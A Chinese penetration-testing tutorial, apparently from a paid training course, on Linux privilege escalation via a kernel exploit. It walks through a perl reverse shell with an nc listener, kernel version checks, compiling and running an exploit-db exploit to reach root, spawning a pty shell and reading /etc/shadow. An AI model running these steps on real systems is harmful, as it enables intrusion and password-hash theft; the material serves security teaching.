1. 首页
  2. 渗透测试

WEB安全第六章提权篇01 LINUX 内核漏洞提权

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

WEB安全第六章提权篇01 LINUX 内核漏洞提权

1、简介


通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache 就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果我想进行内网渗透就必须将权限提权到最高,如系统权限 超级管理员权限。
2、创建交互shell
linux 提权 需要交互shell
可以使用工具 perl-reverse-shell.pl 建立 sockets
增加运行权限
chmod +x perl-reverse-shell.pl
本地使用nc 监听端口
nc -vvlp 1234

http://www.moontester.com/upload/ec69e40706de8558e71cd85cd17589b3x.php

WEB安全第六章提权篇01 LINUX 内核漏洞提权

nc 监听

WEB安全第六章提权篇01 LINUX 内核漏洞提权

3、查看发行版

cat /etc/issue

cat /etc/*release

查看内核版本

uname -a

4、查找可用的提权exp

https://www.exploit-db.com/

Linux moonteam-virtual-machine 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32

:37 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

https://www.exploit-db.com/exploits/37292

5、进行提权

在目标机子编译提权exp 如果编译不成功在本地编译后在上传的目标上

gcc exp.c  -o exp

增加运行权限 chmod +x exp

运行 ./exp

WEB安全第六章提权篇01 LINUX 内核漏洞提权

当前用户从www-data提权到 root
切换shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
查询当前用户 id
查询密文文件
cat /etc/shadow

WEB安全第六章提权篇01 LINUX 内核漏洞提权

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/379.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息